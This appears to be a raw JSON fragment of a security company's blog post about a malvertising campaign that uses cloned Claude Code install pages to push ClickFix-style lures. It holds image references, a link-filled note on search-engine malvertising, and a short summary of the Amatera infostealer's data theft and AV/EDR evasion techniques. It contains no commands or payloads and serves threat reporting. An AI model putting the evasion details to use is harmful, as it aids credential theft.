1",{"url":4505,"width":4492,"height":4506},"https://images.ctfassets.net/y1cdw1ablpvd/3ymf2ZJNmWE0U09oOQktzj/74984e9a094f01df4bcb661e23d58992/image2.png",1128,{"sys":4508,"__typename":4488,"title":4509,"caption":118,"layoutMode":118,"file":4510},{"id":3582},"Cloned page lure 2",{"url":4511,"width":4492,"height":4512},"https://images.ctfassets.net/y1cdw1ablpvd/YbK5GVyftUS5G09jmdxSG/cc4c2cca40f873879d69371eab526b56/image3.png",1107,{"sys":4514,"__typename":4488,"title":4515,"caption":4516,"layoutMode":118,"file":4517},{"id":3588},"Lure 3","Google Search sponsored results for Claude Code cloned pages",{"url":4518,"width":4519,"height":4520},"https://images.ctfassets.net/y1cdw1ablpvd/3sLwOnpET892xdFyvBtzfn/956963620a9cec4bafd3b3a63f0426b0/image5.png",1915,903,{"sys":4522,"__typename":4428,"content":4523,"name":4563,"title":118},{"id":3594},{"json":4524},{"nodeType":1295,"data":4525,"content":4526},{},[4527],{"nodeType":1294,"data":4528,"content":4529},{},[4530,4534,4543,4547,4554,4558],{"nodeType":1293,"value":4531,"marks":4532,"data":4533},"Malvertising is an extremely prevalent distribution method ",[],{},{"nodeType":1329,"data":4535,"content":4537},{"uri":4536},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[4538],{"nodeType":1293,"value":4539,"marks":4540,"data":4542},"we've seen used extensively",[4541],{"type":1337},{},{"nodeType":1293,"value":4544,"marks":4545,"data":4546}," to distribute both phishing payloads and ClickFix-style lures (including the ",[],{},{"nodeType":1329,"data":4548,"content":4549},{"uri":1331},[4550],{"nodeType":1293,"value":1334,"marks":4551,"data":4553},[4552],{"type":1337},{},{"nodeType":1293,"value":4555,"marks":4556,"data":4557}," campaign we uncovered last year). ",[],{},{"nodeType":1293,"value":4559,"marks":4560,"data":4562},"In fact, 4 in 5 ClickFix lures we intercept are accessed from search engines.",[4561],{"type":1444},{},"installfix insight box 1",{"sys":4565,"__typename":4566,"type":4567,"ctaText":4568,"buttonLabel":87,"buttonColour":4569,"buttonUrl":66},{"id":3639},"CtaWidget","Custom","Read more about stealthy attack delivery and techniques in our new report, analysing the different browser-based techniques behind in-the-wild breaches in 2026.","sunny orange",{"sys":4571,"__typename":4428,"content":4572,"name":4590,"title":118},{"id":3714},{"json":4573},{"nodeType":1295,"data":4574,"content":4575},{},[4576,4583],{"nodeType":1294,"data":4577,"content":4578},{},[4579],{"nodeType":1293,"value":4580,"marks":4581,"data":4582},"Amatera is a relatively new infostealer used by cybercriminals to steal sensitive data, such as browser saved passwords, cookies, session tokens, and general system information. It started appearing publicly around 2025 and is considered an evolution of an older malware family called ACR Stealer, and is sold via subscription to criminal operators.",[],{},{"nodeType":1294,"data":4584,"content":4585},{},[4586],{"nodeType":1293,"value":4587,"marks":4588,"data":4589},"The malware uses various techniques designed to bypass AV/EDR, including direct NTSockets for C2, dynamic API resolution with WoW64 Syscalls, and multi-stage infection chains with dynamic payload delivery. Amatera communicates with its C2 server using hardcoded IP addresses belonging to legitimate CDNs, making the traffic difficult to block without disrupting legitimate services.",[],{},"installfix insight box 2",{"sys":4592,"__typename":4428,"content":4593,"name":4632,"title":118},{"id":3727},{"json":4594},{"nodeType":1295,"data":4595,"content":4596},{},[4597],{"nodeType":1294,"data":4598,"content":4599},{},[4600,4605,4609,4617,4620,4628],{"nodeType":1293,"value":4601,"marks":4602,"data":4604},"Edit: ",[4603],{"type":1444},{},{"nodeType":1293,"value":4606,"marks":4607,"data":4608},"When investigating different domains, we found additional research that indicates a variety of similar payloads being distributed. Our primary focus here is on the scale of the campaign and the lure delivery technique rather than deep analysis of the malware itself. Check out ",[],{},{"nodeType":1329,"data":4610,"content":4612},{"uri":4611},"https://medium.com/@maurice.fielenbach/paste-with-caution-how-a-fake-claude-code-installer-drops-a-fileless-implant-via-deserialization-a85068955c0a",[4613],{"nodeType":1293,"value":4614,"marks":4615,"data":4616},"this detailed analysis for one such teardown",[],{},{"nodeType":1293,"value":1402,"marks":4618,"data":4619},[],{},{"nodeType":1329,"data":4621,"content":4623},{"uri":4622},"https://www.reddit.com/r/CyberSecurityAdvice/comments/1riq3zj/i_accidentally_ran_a_suspicious_curl_command_in/",[4624],{"nodeType":1293,"value":4625,"marks":4626,"data":4627},"this Reddit thread",[],{},{"nodeType":1293,"value":4629,"marks":4630,"data":4631}," for another example.",[],{},"installfix insight box 4",{"sys":4634,"__typename":4482,"title":4635,"arcadeDemoUrl":4636,"playText":4637},{"id":3886},"ClickFix attack evolution demo","https://demo.arcade.software/UhbkGxUUQC8xpS5z88sx?embed","2 mins","content:blog:installfix.json","json","content","blog/installfix.json","blog/installfix",1776359981610]